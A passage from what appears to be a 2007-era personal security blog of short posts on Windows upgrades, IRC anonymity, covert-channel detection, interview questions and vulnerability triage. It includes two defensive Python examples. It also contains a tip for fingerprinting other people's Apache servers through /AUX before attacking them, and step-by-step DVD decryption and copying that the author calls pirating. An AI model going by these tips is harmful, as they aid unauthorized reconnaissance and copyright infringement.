    3) I wonder what state we'd be in if we didn't have what security we do have now?

    4) It might help to look at security and nature (Arms Race? evolution?) throughout history. It might give Noam some more perspective on reasonable expectations in security.
    .: securityhacks show off security hacks
    I don't typically single out new links I add to my menu, but the blog at SecurityHacks has been posting some neat stuff. I still think there is "market bandwidth" for sites that show off tools or "how-to" sorts of postings in our niche blogosphere (although a forum or wiki may be more appropriate long-term information storage). They have gone over creating an SSH tunnel for Windows SMB connections (I think if you're going to this much trouble, may as well learn SSH transfers or implement a full VPN), SQL Injection scanners, and "recovering" Firefox stored passwords. There's also mention of pwdumpx (not to be confused with pwdump or even fgdump...).
    .: keeping current or finding new niches
    Every now and then I like posting about new and coming technologies or things that budding (or bored!) security persons can look into to get a leg up on other professionals. While I may not have bandwidth myself, I can at least identify them for my own reference or anyone else as well.

    Vista. While lots of people are resisting Vista as not an entirely necessary upgrade, this is, quite frankly, the future of Windows computing. It might not be even next year, but at some point all of us will be forced to update to Vista, either due to dropped support for XP or simply because all our home users' new computers come with it installed...then remote access needs updating, QA needs test machines, web sites need to work...and so on until you have to adopt it. So get Vista today, be aware of the licensing and versions, figure out the nuances of wireless and wired and security concepts in Vista, and tinker with supporting it on a wide scale (scripts, GPO, firewall, etc). May as well start now and get moved, otherwise you'll be like me where I still run Win2000 laptops (ok ok, so I like the non-hassle of Genuine Advantage license checks that don't exist for Win2000 and the smaller resource footprint on my old laptops...). Nonetheless, it may be years away, but rest assured someday Vista will be the standard.

    Macs. Macs have long been on the fringe of corporate networks, likely only used by graphics or designers. They are exceptions in corporate policy and management and typically corporate IT have no Mac experts and leave management to third party contractors or the users themselves. As Macs continue to make headway into home users (and especially security people like us) it makes sense that we become Mac-aware enough to support those users and add that to our corporate IT merit badges. Like I said, few IT geeks really can support the Macs, so one-up the rest and learn them. As a bonus, try to figure out how to make sure your monitoring and systems management can become Mac-friendly so they're not always the exceptions to the rules.

    Get on top of Longhorn now. While slated for the ever-skeptical release date of early 2008 now, like Vista, it will eventually be the de facto standard, for better or worse. Likewise, get ready for Powershell, Windows' upcoming enhanced shell experience (which will also be the primary means to manage Exchange 2007).

    This is one of the challenges of being an IT geek. You can't just learn Windows 98 inside and out and hope to stick with it forever. You gotta be ready to move with the world and learn new things rather than sit back and cling to the past. Ask any mainframer from the 80s and 90s who doesn't get to work on mainframes anymore...
    .: fe3d nmap scan visualization
    From Windows Incident Response I was reminded about fe3d, a 3d visualization tool for nmap scans. While possibly not very practical, it does make for feel-good eye candy in a dark room or when someone is watching you that you want to impress (managers!). The timeline on this project only goes back a few months, but I swear I saw this tool a couple years ago.
    .: rdp into console session
    Want to RDP not into your own session, but into the existing console session? Yeah, me too, and I always seem to forget this Run command for Windows:
    mstsc /v:SERVER-OR-IP /console
    .: data protection rambling: data in use
    Managing security from a data-centric point of view is like herding cats. Rambunctious cats. Cats that want to be free. Cats that spontaneously multiply. Like tribbles.

    I was thinking today about how interesting something like a centralized Office suite (such as Google Apps) would be when it comes to making sure people are not distributing your data wantonly. For instance, how often have you seen the sales exec who has access to sensitive information in a file share forward a copy of that document via email to his reports, who shouldn't be seeing that stuff?

    This brings me to thinking about data security a bit more. Often I see people talk about the two obvious pieces: Data At Rest and Data In Motion. These are pretty obvious. Data At Rest deals much with access permissions and encryption. Data In Motion deals with encryption of the channel over which data is transmitted.

    But there is more. What about Data In Use? Can your users print, copy, move, and otherwise twiddle the data they have access to? No amount of the first two pieces will stop that sales exec from making his mistake. Can they open a doc and recite the numbers to someone over the phone or take photos of it? Yes, tough if not impossible to fully stop, but a concern nonetheless? (Yes, it is arguable whether we should spend time thinking about the unfixable...)

    You know, the corporate world was once a terminal environment with centralized computing. We've moved on from that, but so far lots of our issues can be solved with tightening back into centralized computing. We don't like to think that way, but it's true.

    The two caveats in centralized computing? The mobility trend. The fact that users are also consumers and are used to having "the power" on their computer systems at home.
    .: ipv6 still only lurking
    IP addresses are running out! While I'm not about to start crying that the sky is falling, the article linked mentions that we will be out of IPv4 addresses in 2012 or 2013.

    Considering most shops spec their network gear lifecycle to 4 or more years, now is the time to start paying attention to the needs of the infrastructure. We can all do our part today to ease the pains of this changeover. Any gear you buy today on your network, particularly the critical and perimeter infrastructure, should either have IPv6 support today or have an aggressive roadmap to get there soon.

    Also, for those budding (or bored!) security persons (again!), study up on IPv6 now. Learn how it works and how to implement and troubleshoot it.
    .: stupid apache windows trick
    Simple things feel good. They really do! Keep life simple. Flashing across the full-disclosure list this week was a simple way to enumerate whether an Apache web server is running on Windows or not.

    If you make a call to a page that does not exist, you get a typical 404 error, like this page that doesn't exist. (Yeah, in a few months I'll regret putting up a purposely dead link when I see it in the logs...). But try hitting a link to domain/AUX. You get a far different error on my site because, yes, stone me now, I run Apache on Windows. Try it on someone else's site that you know is running Apache on nix, and you'll just get the normal 404 error.

    So next time you're curious about a web site and you've confirmed it runs Apache, try the "on Windows?" test so you don't look stupid trying to use "root" on the listening SSH port or throw in a battery of nix-only vulns to the website.
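    On the receiving end of this trick, the same reserved names stand out in your own access log. As an added example (written for this page, not code from the post or from Apache), this parses combined-format log lines and flags any request whose path names a Windows device; the log lines and their status codes are constructed.

```python
"""Flag requests for reserved Windows device names in Apache access logs.

Added example, not from the original post. Windows treats CON, PRN, AUX,
NUL, COM1-9 and LPT1-9 as devices regardless of directory or extension,
which is why Apache on Windows answers /AUX with something other than the
usual 404 and why such a request is a cheap "is this Apache on Windows?"
probe. The log lines and status codes below are constructed for the example.
"""
import re

# Reserved DOS device names. Windows ignores any extension, so "com1.jpg"
# still names the COM1 device.
RESERVED = {"CON", "PRN", "AUX", "NUL"}
RESERVED |= {f"COM{i}" for i in range(1, 10)}
RESERVED |= {f"LPT{i}" for i in range(1, 10)}

# Apache combined log format:
# host ident user [time] "method path protocol" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

# Constructed sample log (addresses from documentation ranges; the status
# returned for a device name depends on the Apache version, 500 here is made up).
SAMPLE_LOG = [
    '203.0.113.8 - - [10/May/2007:13:55:36 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/May/2007:13:55:40 -0500] "GET /does-not-exist HTTP/1.1" 404 300 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/May/2007:13:55:44 -0500] "GET /AUX HTTP/1.1" 500 600 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/May/2007:14:02:01 -0500] "GET /images/com1.jpg HTTP/1.1" 403 250 "-" "curl/7.15"',
    '198.51.100.3 - - [10/May/2007:14:02:05 -0500] "GET /community/index.php?id=3 HTTP/1.1" 200 2048 "-" "curl/7.15"',
    'garbage line that does not parse',
]


def reserved_device_in_path(path):
    """Return the reserved device name found in any path segment, or None.

    The query string is dropped and the extension ignored, matching how
    Windows resolves the name ("/images/com1.jpg" -> "COM1").
    """
    for segment in path.split("?", 1)[0].split("/"):
        base = segment.split(".", 1)[0].upper()
        if base in RESERVED:
            return base
    return None


def flag_device_probes(lines):
    """Return (client, path, device, status) for every parseable log line
    that requests a reserved device name. Lines that do not match the
    combined format are skipped rather than raising."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        device = reserved_device_in_path(m.group("path"))
        if device:
            hits.append((m.group("host"), m.group("path"), device, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for hit in flag_device_probes(SAMPLE_LOG):
        print("device-name probe:", hit)
```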
    .: eve
    Whitedust.net has announced a new visualization tool for network traffic called Eve. Visualization tools are fun and typically look cooler than they are useful (imagine the proud managerial looks when you see this running in the NOC?), but you never know. Someday a really slick-looking visualization tool is going to be outstandingly useful. Maybe Eve will hit that mark? I dunno, but surprisingly the tool looks to run on Windows, judging by the mention of the winpcap library. If this looks slick enough, I would seriously consider a copy for the price they list, even if it just runs in the background on an old machine on my desk.
    .: staying anonymous - part 4 irc
    IRC - IRC is an interesting beast. Even today, this relic of the Internet is still the best place to socialize and talk with others in a realtime forum that includes more than just 1-to-1 conversation (did I qualify that enough??). But it also suffers from easily giving up your connection information as well as other anti-anonymity attacks. Pretty much anyone can just issue a /whois and read back your IP/hostname. Really, nothing is easier or more idly tempting than port scanning some noob on IRC to see who's home. Note: I have not used silc yet, so I don't really mention it here.

    1) general IRC recon and host masks
    When you first log into a new IRC network, do not do so using a nickname that you plan to use. Log in and poke around. Do a /whois on yourself and see what is revealed. Connect a second time with another name and whois yourself. Find web support and the main support channels and poke around to see if the network supports any built-in methods to mask your host and IP. Irc.freenode.net and others may allow you to register your nickname and also request or set up a host mask so that /whois returns only what you want it to return. If that is the case, switch over to your normal nick, register it, and get it masked.

    Always use a different nickname when doing tests or when you think your masking is not high enough. While this isn't done as much as in the past, there are still chat channels that get logged and posted right on websites for posterity.

    Keep in mind that even private messages are not necessarily private when you do not own the servers and other people are the admins. You may not be as private as you wish you were.

    If you plan any unattended idling, turn off auto-accepting any files or DCC communications and make sure no URLs are automatically opened or captured. Make sure your secondary nickname is not revealing in case you disconnect and reconnect automatically before your old connection has timed out.


    2) bouncers and proxies
    If you do not have the luxury of masking your host, you can make use of IRC bouncers or proxy connections much like web proxies. Bouncers are pretty much the same thing as a proxy, only harder to find unless you own a box or two somewhere else (or pay for a shell).

    You can also use web-based IRC clients such as www.ircatwork.org. However, always test these by connecting with a different nick and /whois yourself to see if something is leaking through anyway. These can be a hassle to set up and maintain, so perhaps just familiarize yourself with IRSSI (text-based IRC) and see if you can get a shell that allows IRSSI so you can bounce off that.

    Otherwise, use network and wireless connections that are not your own to communicate over IRC. Personally, I prefer using Freenode and masking my host.


    3) links, DCC, other notes
    Also, don't click on any and every link in IRC...at least not without your web proxy firmly in place on a safer web browser and connection link. If I had my eye on you, I might try to get you to click a link on my website hoping you would then leave some crumbs in my server logs.

    Never accept DCC Chats or Sends. These negotiate as direct connections. If you accept a DCC Chat, the person on the other end will have the ability to see your originating IP, masks or not. You can proxy DCC connections, but I prefer to just not accept them at all as there is really no reason for it when FTP and HTTP have become more than ubiquitous.

    More information can be found at http://www.searchlores.org/irc_kane.htm. If I had found this before writing my post, it sure would have saved me a lot of composing!
    .: open windows security apps
    I love it. There are a number of free security-related tools floating around these days and they seem to be of the "do more, have more features" variety. On my Windows systems at home I prefer to run ClamWin as my AV and Sygate Pro (a full version pre-Symantec purchase/dump) as my personal firewall. I've been using Comodo firewall for a while now on one laptop, but I really have not taken the time to baby it and nurture it and really get to know it, so I might just revert back to a Sygate install.

    But I keep getting tickles to try something new. I see OSSEC has Windows agents that do things like HIDS, log analysis, registry and rootkit scanning, integrity scanning, and more on the server component. I also see CoreForce which provides a BSD-like firewall, registry and file permissions, integrity scanning, and malware prevention. Both tools are free, although the latter is Windows-bound and standalone while OSSEC likes to have a server component to shuttle data to.

    It is nice to see multiple pieces getting packaged together in, hopefully, light-weight apps that won't be hogs like NAV or your more commercial type protections. I like integrity checking, access monitoring, log scanning, and firewalling, along with the typical HIDS/behavioral analysis and malware detection/prevention. I'm just hoping these two products don't overlap too much if I want features from both. And of course, there's my poor ClamWin to think of.

    Anyway, tools for thought. I really wish Sygate hadn't been raped...after ZoneAlarm got dumbed down back in like 1999, Sygate was my saviour...
    .: fbi has some infosec work to do
    Seems the FBI has the same challenges the private sector has when it comes to maintaining a secure environment. The GAO released a report to the FBI about security weaknesses in a critical internal network. I found this from FCW. I only skimmed the 30-odd page report, but a lot of their weaknesses are quite familiar.
    .: infosec interview questions
    LiquidMatrix posted 4 interview questions for Infosec candidates. I like the questions, personally, and I think they get to one thing I really like to pimp about myself but also value in people in infosec: the geek factor. How much of a geek are you? In other words, how much personal passion do you have for the field? I think this is highly important. Anyway, no preaching yet today, so here are my quick answers for this interview.

    1. What is the hostname of your computer / essid of your wifi
    How fun! For years, I have stuck to the whole vampire/goth chic with my systems. My main server is named Vampire (and always is, no matter what actual hardware is running it) and my essid is kindred. Unfortunately, the more systems I've had, the more I've had to drift away from that theme. I have systems named Nosferatu, Hunter, Samurai, Orion (my main laptop, named for personal reasons to do with stargazing), Golem (parted gaming machine), and so on...

    2. Which infosec event/conference do you think is the *one* you need to attend each year
    Blackhat is too expensive for me alone, and I certainly do not want to go to anything commercialized with more CSOs present than geeks. I think if I had to choose one single event, I would head to Shmoocon. Then CanSecWest and DefCon.

    3. You’re doing a walk around and notice an iPod plugged into a laptop - what do you do
    Yeah, it sucks reading these questions and already seeing the "good" answers, but I agree with the poster, I would first ask, "Well, what's the policy?" I don't want to get into pissing matches over vagueness (I wanted to use vagarity here, but the word is already laterally claimed) of policies and enforcement. If I don't have to impact someone else and rock the boat, I won't. So I'd ask about the policy. If there is a policy, I would likely unplug the ipod but leave it on the desk (again, depending on the policy and corporate culture standards on enforcement) and email a note to the employee mentioning it. I'd likely then make a small extra effort to follow-up later that week to see if the ipod is still present, and if so, escalate as needed, more likely with a cubicle-call in person or a quick note to their manager. Nothing overbearing or demanding, just subtle reminders of policy and why it is in place. I'd also test the waters in using technology to block the hardware ports on systems to force policy adherence. Again, though, this all depends on policy and corporate culture.

    4. You’ve been asked by HR to take a copy of an outgoing employee's computer - what do you do
    I've not done one of these in a while, but my first reaction in my previous job where I did this a couple times included questions. How much do you need copied? When do you need this started and done? Does the employee know about this or should this be secret? How important is this; while I don't need details, should I be concerned about eventual legal proceedings or is this just a CYA moment (this may dictate how stringently I follow chain-of-custody or imaging standards)? Do you need me to look at anything in particular or just make the copy? What do you want done with the copy and/or hardware after? Basically, the theme here is to ask questions and qualify the request as much as possible without making it seem like you're fishing for the juicy gossipy details of the incident; I'm not like that and never will be, even when I am privy to those details (one of the other things I value along with geekery is integrity).

    Snagged straight from the bush from the Guerilla CSO
    .: the movement of security
    I see there's been some talk recently (more so than normal on the blogs I watch, anyway) about network security, web app security, host-centric security... I feel like a lottery tumbler bouncing around a lot of balls in my head, but nothing popping out down the chute quite yet. So here are some links for future thoughts. Jeremiah Grossman talking about web app vs network security. Hoff talking about host vs network security. The Jericho Forum talking about lots of things, but notably deperimeterization catches my eye. And Michael's thoughts which have the side effect of wanting to pull out some C&C Music Factory mp3s (and yes, I have a bunch!). I also see Scott has an excellent post about this topic as well. And another from Alex, although once anyone starts talking ephemerally (in terms of relativity to business process which might be the agnostics' way to offer up an inarguable concept? [see? obviously I'm not seeing something straight! hehe] ) about things like the Circles of Trust, it never really makes much sense to me yet (yet!).

    My initial reaction is that I am not sold on "unified" or "one method to rule them all" approaches. I'm with Michael in the link above in most regards: practice moderation and mix all of them in varying levels. Honestly, if one of these approaches was better than the others, it would be obviously apparent by now.

    However, there may be some merit in a company focusing their efforts and monies in one method consistently...

    I think one approach to these questions might be in looking at the extremes. What would your network or company look like from an infosec point of view if you were host-centric in your approaches? or network-centric? or data-centric? What is given up, what is scalable, what costs the most either up front or on-going? What is possible with the skillsets we have in our company/country/world right now?
    .: wifidenum reports on wireless driver vulns
    WiFiDEnum (and no, I'm not really sure how to say that out loud) has been released by Joshua Wright. This tool reports back wireless driver versions against known vulnerabilities. Try it out. Hopefully the tool is kept up to date as more vulns become announced (slowly). While I never expect that to be the case, I think this tool appears useful enough to Josh and his company and might get some lovin over the years. The next step may be a more hostile enumeration tool that can sniff and/or actively fingerprint a host's wireless card and drivers (and no, I don't know if that is even possible to a worthwhile degree).
    .: analyzing vulnerability disclosures
    I just read an announcement that usernames can be disclosed by the way Windows Server 2003/AD responds to Terminal Services logins from those users trying to log on after their allowed hours. Kudos to the researchers for finding and reporting this, and I mean this post as no dis to them (hey, I read Sid's site for a reason!). But I do have some commentary to offer.

    First, Sid uses the phrase, "This can be exploited to help enumerate valid usernames resulting in a loss of confidentiality." Not bad, but I think it is very arguable whether usernames are intended to be confidential or not. I mean, that's what passwords are for, no?

    Second, this is a place where a vulnerability needs further clarification once you start trying to cross the bounds from technical geeks to the lesser geeks and business itself. Is this vulnerability a Big Deal? No. What threats could take advantage of this? Well, you have long-standing insiders (yeah, those help desk guys who work all night and get bored and poke around) on a long campaign to pilfer usernames...but if they are employees, chances are they know the username format anyway. Also long-term outside attackers who already have an undiscovered foothold into the network and want to expand their influence. For some reason, this scenario tickles that part of my brain that likes to say, "You have bigger problems at this point." Maybe someone has Terminal Services accessible to the world, in which case a random port scan could reveal it to an outside attacker who starts trying usernames to grind out more information, or outright access.

    My second point is more about those people who interpret vulnerabilities in the context of their respective duties. The disclosure itself is just fine and quite appropriate. I'm simply using it as a sounding board to illustrate the ability to analyze vulnerabilities.

    To the author's credit, he lists criticality being "Less Critical," although I really don't know what that means. To me, this vulnerability is minor. It discloses some non-sensitive information pertinent to longer-term attacks by dedicated attackers with nothing better to do.
    .: random thoughts on spam and email sig blocks
    Skimming my captured spam comments these days really makes me feel like I'm browsing porn, albeit in text form. I have quite the imagination...and if the guys keep slipping Viagra into my lunch, things are gonna get wrong on a new level.

    Ok, kidding! Seriously, my comment spam has skyrocketed since Thursday or Wednesday of last week, almost all about various drugs and the rest about porn. It is amazing how often I catch myself reading one when it doesn't sound quite obviously spamlike. "Hey man, that's an interesting post..." I've bumped up the filters to get most everything, but if I don't unmoderate a post you make, feel free to stalk me and track me down or otherwise get my attention.

    Joel Esler posted some questions about email signature blocks. Neat. Personally, I keep my signature lengths down to 1-3 lines or so. My name, email address, and maybe who I am if you don't know me (title or web site). I think I got over the whole quote thing back in 1998, so I don't do that anymore. I think after you get so many email addresses, you stop really caring to configure and tailor each one.

    On a similar topic, I really have a peeve against email disclaimers like "please delete this email if you mistakenly got this..." blah blah blah legal crap. No one freakin' needs this on every piece of email sent out. It's useless and stupid. Maybe I should walk around with a card that says, "If I hear some secret you say near me or you hear me calling you a complete asshole, it's ok and please ignore it if you were not the intended recipient...oh, you're not the intended recipient, ever." Yeah, that'd fly.
    .: no one expects the covert channels

    Typically at home I have this stack of papers and junk printed out that I want to flip through and read. Kinda like bookmarking something for later, only in the analog world. Lately, I happened to hit a glut of papers talking about covert channels (I'll link one or two if I still happen to have them around), which are always fun to look at. I then see the focus-ids list has a current discussion on detecting covert channels (really detecting encrypted channels which, as Ron Gula recently contributed, are a separate issue).

    Covert channels are fun. They can be an easy way to break something, or use something for a purpose not intended by the creators. The old school version of "hacking" (which I subscribe to) tends to love this definition. They are also difficult and technical in some cases, thus I really believe that unless a firewall or proxy incidentally is blocking the channel, no one really blocks or watches these channels. If I ever get my home network more rounded out and the major projects done, playing with covert channels is something I'd love to tinker with. (And if I would do it, so would lots of other bored kiddies on the Help Desks at their jobs!)

    [As an aside, I pick on the poor kiddies on the Help Desk or Tech Support or Customer Service desks a lot. I do so for good reason, though. Typically they can hold some very technically savvy people who have some level of access above normal users. They tend to not be in heavily taxing jobs and sometimes have "leisure" time at work to do some odd things. And let's not even think about those overnighters with even more time on their hands... Really, it's not that I distrust them, but I remember my days down there and what I would get my fingers into, and I know it happens.]

    For instance, you can stuff information into a few non-used or little-used sections of ICMP packets and shoot them out to your target. But if a company is stopping all ICMP, that incidentally stops that particular covert channel. Someone can siphon away information using DNS, but if you only allow DNS traffic to servers you control...

    Stopping (or using to your benefit) covert channels is much more difficult since it requires some pretty specific knowledge of TCP/IP and perhaps packet structure and creation. This probably makes the risk of someone leveraging this attack much smaller, which also may mean it is just not worth spending time combating for many companies.

    But let's say you want to detect and/or stop covert channels? I won't get into specifics since I've not done this myself, but here are some approaches I would take.

    First, make sure a solid egress configuration is present on the border firewalls. If this isn't done, really, any other steps are simply academic and not going to add any security or sense of security. If you're not stopping arbitrary ports from connecting to other arbitrary ports on the Internet... Likewise, there is no reason to tackle ICMP covert channel detection if ICMP is blocked anyway.

    Second, you need to be monitoring for anomalous traffic. A sudden spike in ICMP or other weird traffic that is not normal could indicate a covert channel in use. Again, the chances are slim, but any network monitoring strategy should already be tracking anomalous traffic loads anyway. You might also want to look for regular traffic patterns such as an HTTP request that occurs exactly every 3 seconds for hours, or something to that effect. You might see more false positives with things like Weatherbug or Firefox doing regular checks or IM keepalives, but if your company is tackling covert channels, likely they have stringent software and IP rules in place already to limit such noise.

    Third, make sure packets are inspected for erroneous settings and flags. Kinda like no TCP packet has any business having both SYN and RST (I think) flags set, there is just some information that, if present, should be investigated.

    Fourth, proxy all web traffic in a way that the proxy rebuilds the packets. This should take care of really funky HTTP covert channels and also allow you more logging on what is likely the busiest and least securable port on your network.

    Lastly, I really don't know what to do about steganography or hiding data inside other application layer data. I guess we have to hope that packet inspection firewalls eventually detect the normal tools and their signature/patterns, but I really wouldn't book my paycheck on that. Image-based stego is still a technical skill, but the tools have gotten far easier to implement and there are tons of locations on the webs to drop images for offsite pick-up.
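    As an added illustration of the second and third approaches above (example code written for this page, not something from the post or the focus-ids thread), here are three small heuristics run over constructed flow records: a source that hits one destination at a near-constant interval, TCP flag combinations no legitimate stack sends, and an ICMP byte count well above a baseline. The record layout, the 3-second beacon, the thresholds and the baseline figure are all assumptions of the example.

```python
"""Toy covert-channel heuristics over constructed flow records.

Added example, not code from the original post. Three checks: periodic
(beacon-like) connections, TCP flag combinations that should never occur,
and an ICMP volume spike against an assumed baseline. Every record below
is constructed for the example, not captured traffic.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed records: (timestamp_seconds, src, dst, proto, flags, bytes)
RECORDS = []
# Host A: an HTTP request every 3 seconds with +/-10 ms of jitter, 20 times.
for i in range(20):
    RECORDS.append((1000.0 + 3 * i + (0.01 if i % 2 else -0.01),
                    "10.0.0.5", "198.51.100.7:80", "tcp", {"SYN"}, 120))
# Host B: ordinary bursty browsing; the gaps are irregular on purpose.
for offset in (0.0, 0.4, 0.9, 7.2, 7.5, 31.0, 31.2, 40.8, 95.0, 95.3, 96.1, 130.0):
    RECORDS.append((1000.0 + offset, "10.0.0.9", "203.0.113.20:80", "tcp", {"SYN"}, 120))
# A segment with SYN and RST both set, which no legitimate stack emits.
RECORDS.append((1005.0, "10.0.0.12", "203.0.113.50:443", "tcp", {"SYN", "RST"}, 60))
# Thirty 1400-byte ICMP packets to one destination in thirty seconds.
for i in range(30):
    RECORDS.append((1000.0 + i, "10.0.0.12", "203.0.113.50", "icmp", set(), 1400))

# Flag sets that cannot occur in a valid TCP exchange.
IMPOSSIBLE_FLAG_SETS = (
    {"SYN", "RST"},   # open a connection and abort it in the same segment
    {"SYN", "FIN"},   # open and close in the same segment
)


def beacon_pairs(records, min_count=10, max_cv=0.05):
    """Return (src, dst, mean_gap) for source/destination pairs whose TCP
    inter-arrival times are nearly constant: coefficient of variation
    (stdev / mean) at or below max_cv over at least min_count events."""
    times = defaultdict(list)
    for ts, src, dst, proto, _flags, _size in records:
        if proto == "tcp":
            times[(src, dst)].append(ts)
    found = []
    for (src, dst), ts_list in times.items():
        if len(ts_list) < min_count:
            continue
        ts_list.sort()
        gaps = [later - earlier for earlier, later in zip(ts_list, ts_list[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            found.append((src, dst, round(avg, 2)))
    return found


def impossible_flag_records(records):
    """Return TCP records whose flags include an impossible combination
    (SYN with RST or FIN) or carry no flags at all (a 'null' segment)."""
    hits = []
    for rec in records:
        _ts, _src, _dst, proto, flags, _size = rec
        if proto != "tcp":
            continue
        if not flags or any(bad <= flags for bad in IMPOSSIBLE_FLAG_SETS):
            hits.append(rec)
    return hits


def icmp_bytes_by_src(records):
    """Total ICMP bytes sent per source address."""
    totals = defaultdict(int)
    for _ts, src, _dst, proto, _flags, size in records:
        if proto == "icmp":
            totals[src] += size
    return dict(totals)


def icmp_spikes(records, baseline_bytes=640, factor=10):
    """Sources whose ICMP volume exceeds factor times the assumed baseline
    (640 bytes is ten ordinary 64-byte pings; both numbers are assumptions)."""
    return sorted(src for src, total in icmp_bytes_by_src(records).items()
                  if total > baseline_bytes * factor)


if __name__ == "__main__":
    print("beacon-like pairs:", beacon_pairs(RECORDS))
    print("impossible flags:", impossible_flag_records(RECORDS))
    print("icmp spikes:", icmp_spikes(RECORDS))
```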

    Speaking of covert channels, I can't find the actual story, but I swear the Security Monkey had a post one time (I think a reader-submitted story) about someone hiding porn images inside a normal movie file, where a porn image would be one frame somewhere that could be extracted. Screen grab of sensitive docs instead?

    .: dvd ripping and burning made simple
    Copying DVDs has become amazingly easy. I picked up a Samsung DVD burner from NewEgg for $33. They forgot the software, so I had them mail that separately, which is well worth it since it is Nero and includes not only the burning utilities but also the parts to leverage the Lightscribe labels.

    I installed DVD Decrypter (pretty much optional) and DVD Shrink (find them on your own, but I suggest doom9.org as a first try). I use DVD Decrypter to rip DVDs to my hard disk, and then I use DVD Shrink to remove a few unnecessary things, like foreign language audio tracks, and also to burn since it can shuttle the project off to either DVD Decrypter (which can burn) or Nero itself. That's it! I ran a test copy of Fast and the Furious which happens to be a dual layer DVD. The ripping portion took about 15 minutes, I think, and DVD Shrink worked on the contents (about 4.5 GB on disk) for about 30 minutes. I removed two audio tracks. It then went right over and burned in about 5 minutes or so to a non-dual layer DVD.

    With Nero, I was able to create a Lightscribe label in about 5 minutes and burn it on in about 15 minutes. I just did a quick Google Image search for Fast and the Furious images, picked the first one (which happened to be huge), plopped it on without resizing or playing with the brightness, and let it loose. The label isn't breathtaking or drop-dead gorgeous. It really just looks like a badly washed out greyscale image, but the quality (if you look closely) seems pretty nice. I'll likely use it rather than markers, and I likely will still use actual images as opposed to bland text in text boxes. I'm not really doing anything professional, just makin' copies!

    All told, that was only about an hour of time and only about 10 minutes of actual work. Since I do this on my gaming machine, it gets to dedicate its time to this task when I'm not gaming (and holy crap does the processing of DVD Shrink drop to a trickle when I fire up WoW!). I keep that system pretty slimmed down, so that 1 hour is not a bad deal really.

    Blank DVDs with Lightscribe will run me about $1 per disc. Dual layer guys will be about $1.5-2 per disc. At least that was my 2 seconds estimation while standing at Best Buy. That's still not bad at all as I estimate my typical DVD purchase is $14, give or take. This is why DVD copying pirating is still worthwhile, I guess!

    .: liaise or die 2!
    Cutaway (possibly the only other guy on the Catalyst forums who gets away with using his screen name!) had a really cool post that I wanted to save here. The part that caught my eye:
    I think that the work Ed Skoudis, HD Moore, David Maynor, and other security researchers are doing help us identify products whose solutions have inherent, accidental, or misguided problems so that we can protect ourselves. But, unfortunately, their work does not instill the uninformed upper management with confidence in the security field. Actually, it probably has them all cussing under their breath. Of course this is where the security professional should be earning their keep by providing a buffer between the constant barrage of seemingly negative information and the actual state of the organization’s environment.
    I am seeing there are numerous roles forming in IT and security. First, you have your IT geeks who actually do stuff (researchers or implementers). You have your business managers who keep an open mind about business and security (CSO/CIO). You have your trainers who deal with people. And you have your liaisons between those groups. I think those liaisons are the newest group and the subject of recent focus on "being more business knowledgeable" topics.

    C-levels don't like this news, but let's all face it. Security is never going to be perfect. The best illustration is to look at the security of those C-levels' homes. Are they foolproof? No. Do they make mistakes like leaving windows or doors open even when they're not home? Yes. Just like everyone else. And if they do have an alarm system, does that preclude their relatives or the security installers from being able to circumvent it should they be determined to do so? Or thieves from just barging in regardless of the alarm klaxons? Security is not something you can achieve and forget about. It is ongoing risk management.

    Business hates hearing that because too often they take the very human approach and think, "Gosh, why bother spending money on this junk?"

    That's where I think the liaisons come in. Just like Cutaway says, they buffer most of that negativity, but I believe they also try their best, along with the trainers, to make sure everyone knows security is not like a light switch that is either on or off.
    .: defcon ctf qualifying rounds this weekend
    Alice over at the Vulnerable Minds blog reminds us that the DefCon CTF quals are going on this weekend. Here are sample solutions for last year's pre-quals. I may just check to see if that Mud is open to all...
    .: no business interest in catching threats
    I only skimmed this article (mostly because of where it came from), but I really caught this line:
    No one has a business interest in catching identity thieves or malware writers. There's no money in it, so no-one's bothered.
    I would also add, while some of us would help and/or deal with threats, we just can't or don't have that authority. Bejtlich is one of the notables who talks about dealing with the threats instead of vulnerabilities. He makes a ton of sense and I agree with him, in theory, I just don't think most of us have any opportunity to deal with the threats beyond identifying them with guesses.
    .: it makes nancy drew look archaic...not that i read nancy drew...
    A while back, Rybolov (Guerilla CISO himself!) posted a link to Heidi, Geek Girl Detective. I finally got time to finish through the story over a latte this weekend and was quite entertained! Must be something about Seattle to have geeky comics (PennyArcade being a notable one)...or maybe the town is more creative than most...maybe it's the rain. And for the record, I read the Hardy Boys and Encyclopedia Brown as a kid, not Nancy Drew.
    .: no, really, i want my credit details sent over email
This past week I began the motions of signing up for a new gym, for a change of pace as summer feels like it has started. So I signed up on the gym's (franchise) website and all that jazz. About a day later I get an email from a residential email address saying that my info is being forwarded somewhere and to expect a call back. This email was then sent to another residential address down in Texas. And of course, my credit and personal details are in the email, nicely formatted with HTML tags.

    Really, there are still many businesses and people who have no idea how insecure digital methods can be. But even if they do, many of them have no idea what to do about it without spending money to get someone to do it for them, or devote time out of their own life to do it.

    If I am happy about nothing else, at least I was able to see that my info was passed over email. This way I won't be chasing my tail should that card end up with fraudulent charges in the near future...I'll have an obvious place to begin.
    .: russian roulette 2.0
    RSnake and also Andy linked to File-Swap with wonderment in their eyes. More like confounded amazement really. But come on, this site is awesome! It is the modern equivalent to russian roulette! Take a spin! Really, how secure in your systems do ya feel, punk?

    Now, I have this thing about user-supplied content and Web 2.0. I've been around long enough to see the days where Rotten and EbaumsWorld have spawned up to house all kinds of disgusting junk before dot-coms even thought of busting. Sadly, this file swap is just as ripe for disgusting content as it is malware content. Maybe more so since the former is far easier to achieve than the latter. Then again, use Metasploit to generate some malicious images...? Either way, some ideas may be cool to generate some "wtf," traffic hits, but a site like this simply cannot have longevity and remain relatively clean.
    .: download the music and get the hack
